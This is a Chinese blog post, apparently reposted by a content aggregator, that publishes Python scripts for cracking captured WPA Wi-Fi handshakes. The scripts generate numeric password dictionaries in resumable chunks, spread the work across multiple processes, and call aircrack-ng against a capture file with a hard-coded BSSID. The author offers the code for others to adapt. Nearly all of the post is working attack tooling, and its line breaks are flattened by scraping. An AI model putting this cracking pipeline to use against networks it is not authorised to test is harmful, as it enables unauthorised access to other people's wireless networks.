众所周知握手包跑包的时候密码字典的生成是个非常头疼的问题，因为10位数的纯数字密码字典就已经很大了，这里我使用的穷举法，根据所给出的字符串中的字符串，穷举出所有密码组合。

为此使用python来进行自动化跑包，而用电脑跑包又非常的浪费资源，跑包的时候完全没法使用电脑了，所以准备在树莓派上进行跑包。可是无论PC还是树莓派跑包最怕的事情就是死机或者停电，so，程序的要求如下：

首先，能够把将要生成的字典分解成小字典来生成，当每个小字典生成结束并跑完的时候，再生成另一个小字典来跑包，如此反复进行；

其次，为了防止树莓派断电，或者突然想自己的电脑，需要程序能够保存已经完成的工作，当下次再启动程序的时候继续上次没有完成的任务；

最后，考虑到多核心cpu的利用，需要生成子进程来跑包，这样程序占用的资源就足够多了，才能充分利用设备来跑包。

函数分布如下：

父进程：

将密码字符串转换为数字字符串的函数

将数字字符串转换为密码字符串的函数

根据开始密码、结束密码、任务数量将所有密码组合分割成符合任务数量的字符串列表的函数，由这个列表来分配给各个子进程需要制作的字典容量

检测子进程是否找到密码并输出密码文件的函数

集合调用上述所有函数的主函数

子进程，只有一个函数和调用，大致流程如下：

利用传入的开始字符串和停止字符串来生成小字典

字典生成后跑包，调用subprocess.check_out()，生成跑包子进程

跑包子进程结束时检查是否得到密码，得到密码后写入文件，以便上级进程能够通过文件来检测到密码已找到

若未得到密码则写入当前字典最后的一个字符串，作为可以中断的存档

好了，父子进程的关系和功能大致都已经叙述了，下面就是开源的内容了：

需要注意

这个代码需要安装aircrack-ng

运行的参数需要在hashcat_attack_tasks_malloc.py的最后修改

跑包的命令需要在hashcat_attack_task.py中修改，代码中有注释

第二次运行程序时需要输入时候继续

资源文件我已经上传，想支持我的可以去下载一下，现在改成免费的，之前不知道为啥csdn给我改成9分了，气死我了！！

//download.csdn.net/download/wachm/12118290

还有，hashcat比这个跑的快，而且可以利用GPU加速，但是不像我这个可以中断，保存任务的进度然后下次继续进行，有高性能设备的小可爱们可以试试这个！

好了，找一找，改一改吧！

hashcat_attack_tasks_malloc.py import subprocess import time import hashcat_attack_name as han# 进制转换 # 进制字符串， 待转换至10进制的字符串 # 返回，10进制数字 def base_change_special_normal(_rule_str, _special):_rule_str = "".join(_rule_str)_special = "".join(_special)t_base = _rule_str.__str__().__len__()t_total = 0t_length = _special.__len__()t_s = _special.__getitem__(t_length - 1)t_total = t_total + _rule_str.index(t_s)t_unit_base = t_basefor i in range(t_length-2, -1, -1):t_total = t_total + t_unit_base * _rule_str.index(_special.__getitem__(i))t_unit_base = t_unit_base*t_basereturn t_total# 进制转换 # 进制字符串，10进制数字， 填充长度 # 返回，给定进制字符串形式的进制 def base_change_normal_special(_rule_str, _decimal, _fill_length):# 进制基数t_base = _rule_str.__str__().__len__().__int__()t_list = []t_decimal = _decimal.__int__()while t_decimal > 0:t_mod = t_decimal % t_baset_decimal = t_decimal // t_baset_list.append(_rule_str.__getitem__(t_mod))if _fill_length > 0 and t_list.__len__() < _fill_length:for i in range(t_list.__len__(), _fill_length):t_list.append(_rule_str.__getitem__(0))t_list.reverse()return "".join(t_list)# dict_string表示所有组合的字符源，task_mount表示分割的任务数，task_length表示生成的长度 # task_starts指定开始的字符串，task_stops指定结束的字符串 # 返回一个列表，以[开始字符串，结束字符串，开始字符串，结束字符串，。。。]的形式返回 def str_task_split(_dict_str, _task_mount, _task_length, _task_starts, _task_stops):_task_mount = int(_task_mount)_task_length = int(_task_length)if str(_task_starts).__len__() != str(_task_stops).__len__():print("str_task_split 参数错误，4,5长度不等")return 0if _task_length != str(_task_starts).__len__():print("str_task_split 参数错误，长度不匹配")return 0# 进制转换t_starts_d = base_change_special_normal(_dict_str, _task_starts)t_stops_d = base_change_special_normal(_dict_str, _task_stops)# 剩余需要生成的总数t_total = t_stops_d-t_starts_d# 每个任务的数量t_task_average = t_total // _task_mount# 任务余数，这个加在最后一个任务里t_task_mod = t_total % _task_mountt_return_list = []for i in range(0, _task_mount - 1):t_return_list.append(base_change_normal_special(_dict_str, t_starts_d, _task_length))print(t_starts_d, end="-->")t_stops_d = t_starts_d + t_task_averageprint(t_stops_d)t_return_list.append(base_change_normal_special(_dict_str, t_stops_d, _task_length))t_starts_d = t_stops_d+1t_return_list.append(base_change_normal_special(_dict_str, t_starts_d, _task_length))print(t_stops_d, end="-->")t_stops_dt_stops_d = t_stops_d + t_task_average + t_task_modt_return_list.append(base_change_normal_special(_dict_str, t_stops_d, _task_length))print(t_stops_d)return t_return_list# 检测是否子进程是否找到密码并输出文件，文件内容是否包含密码 # 文件名前缀，进程数量，文件扩展名 # 返回True表示找到密码 def hashcat_attack_sub_has_passwd(_out_pre, _mount, _out_type):_mount = int(_mount)_has_passwd = Falsefor i in range(0,_mount):_file_name = _out_pre+str(i)+_out_typetry:f = open(_file_name, 'r')if f.readline().find('KEY FOUND') >= 0:_has_passwd = Truef.close()breakexcept IOError:passreturn _has_passwd# 得到分配列表 # 分配进程 # 读取子进程进度，记录子进程已完成的密码，显示子进程已完成的密码 def hashcat_attack_tasks_malloc(_dict_str, _task_mount, _task_length, _task_starts, _task_stops):_task_mount = int(_task_mount)_task_length = int(_task_length)# 检测是否存在上一次的任务，并且是否继续上一次的任务print(time.asctime(time.localtime(time.time())))_has_load_task = Falsetry:continue_file = open(han.continue_file_name, 'r')__task_mount = continue_file.readline().strip()_is_finish = continue_file.readline().strip()continue_file.close()if _is_finish == han.continue_flag:ask = input('是否继续未完成的任务（Y/n）：')print(ask)if ask.lower() == 'yes' or ask.lower() == 'y' or ask == '\n':task_str_list = list()for i in range(0, _task_mount):_task_load_file = open(han.split_load_file_pre+str(i)+han.split_load_file_type)task_str_list.append(_task_load_file.readline().strip())_has_load_task = True_task_mount = int(__task_mount)except IOError:pass# 分配列表if not _has_load_task:task_str_list = str_task_split(_dict_str, _task_mount, _task_length, _task_starts, _task_stops)task_list = list()# 创建任务列表for i in range(0, _task_mount):task_argument_list = ['python', 'hashcat_attack_task.py', _dict_str, task_str_list[i * 2], task_str_list[i * 2 + 1], str(i)]task_list.append(subprocess.Popen(task_argument_list))# 创建记录文件continue_file = open(han.continue_file_name, 'w')continue_file.write(str(_task_mount)+'\n')continue_file.write(han.continue_flag)continue_file.close()while True:# 60秒查询一次子进程的状态，当有进程得到密码时，停止所有的进程time.sleep(60)# 用于判断所有进程是否结束task_all_over = 0# 检测任务是否结束，检测子进程是否输出密码文件for i in range(0, _task_mount):if task_list[i].poll().__str__().strip() == "None":# 检测是否输出密码文件的函数if hashcat_attack_sub_has_passwd(han.output_pre, _task_mount, han.output_type):# 结束所有进程task_all_over = _task_mount# 写入任务完成continue_file = open(han.continue_file_name, 'w')continue_file.write(str(_task_mount) + '\n')continue_file.write(han.continue_flag)continue_file.close()print('找到密码请查看目录下文件')print(time.asctime(time.localtime(time.time())))else:task_all_over = task_all_over+1if task_all_over == _task_mount:for i in range(0,_task_mount):task_list[i].terminate()breakprint('当前字符集所有组合已经全部尝试')dict_str = "1234567890" task_length = 10 task_mount = 4 task_starts = "1234491111" task_stops = "1234560000" hashcat_attack_tasks_malloc(dict_str, task_mount, task_length, task_starts, task_stops) hashcat_attack_task.py # coding=utf-8 import sys import subprocess import shlex import hashcat_attack_name as han# number是当前进程被分配的字符串标记，用来防止写文件的时候重名 # 参数：字典的源字符集，开始字符串，停止字符串，文件标记 def hashcat_attack_task(_dict_string, _starts, _stops, _number):# limit限制字典条数limit = 10000000dict_file_name = han.dict_pre + _number + han.dict_typedict_file = open(dict_file_name, 'w')_dict_string = str(_dict_string)_starts = str(_starts)_stops = str(_stops)dict_string_length = _dict_string.__len__()tab_key = list()tab_count = list()tab_length = _starts.__len__()# initfor i in range(0, tab_length):tab_key.append(_dict_string.__getitem__(i))tab_count.append(0)# set from startsfor i in range(0, tab_length):tab_count.__setitem__(i, _dict_string.index(_starts.__getitem__(i)))tab_key.__setitem__(i, _dict_string.__getitem__(tab_count.__getitem__(i)))print("starts:" + "".join(tab_key))print(tab_key.__len__())print(tab_count.__len__())gcount = 0_found_key = Falsekey = "none"while "".join(tab_key) != _stops :# global countergcount = gcount + 1# last key ++cur = tab_count.__getitem__(tab_length - 1)tab_count.__setitem__(tab_length - 1, cur + 1)# check length-1 to 1, the 1st can't be checked in herefor i in range(tab_length - 1, 0, -1):if tab_count.__getitem__(i) == dict_string_length:pre = tab_count.__getitem__(i - 1)tab_count.__setitem__(i - 1, pre + 1)tab_count.__setitem__(i, 0)# check the 1stif tab_count.__getitem__(0) == dict_string_length:break# reload tab_keyfor i in range(0, tab_length):tab_key.__setitem__(i, _dict_string.__getitem__(tab_count.__getitem__(i)))# writekey = "".join(tab_key)dict_file.write(key + "\n")# 中断，写字典，跑包if gcount >= limit or key == _stops:dict_file.close()# 使用aircrack跑包命令在此，请自行修改，可以删去-b参数argument = 'aircrack-ng -a2 -b 88:10:8f:36:6c:6c -w ./' + dict_file_name + ' ./-05.cap'argument = shlex.split(argument)result = subprocess.check_output(argument).decode(encoding="utf-8").split('\n')# 记录当前任务_task_save = open(han.split_load_file_pre + _number + han.split_load_file_type, 'w')_task_save.write(key+'\n')_task_save.write(_stops)_task_save.close()# 如果找到密码则写入文件for i in result:if i.find('KEY FOUND') >= 0:_output = open(han.output_pre + _number + han.output_type, 'w')_output.write(i)_output.close()_found_key = Truebreakdict_file = open(dict_file_name, 'w')if _found_key:breakdict_file.close()# hashcat_attack_task('1234567890', '1234564444', '1234567890', str(5)) hashcat_attack_task(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]) hashcat_attack_name.py output_pre = 'hashcat_attack_passwd_' output_type = '.txt'dict_pre = 'hashcat_attack_dictionary_' dict_type = '.txt'continue_file_name = 'hashcat_attack_continue.txt' continue_flag = 'unfinished!'split_load_file_pre = 'hashcat_attack_task_' split_load_file_type = '.txt'

结束！

总结

以上是生活随笔为你收集整理的wifi握手包自动跑包的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。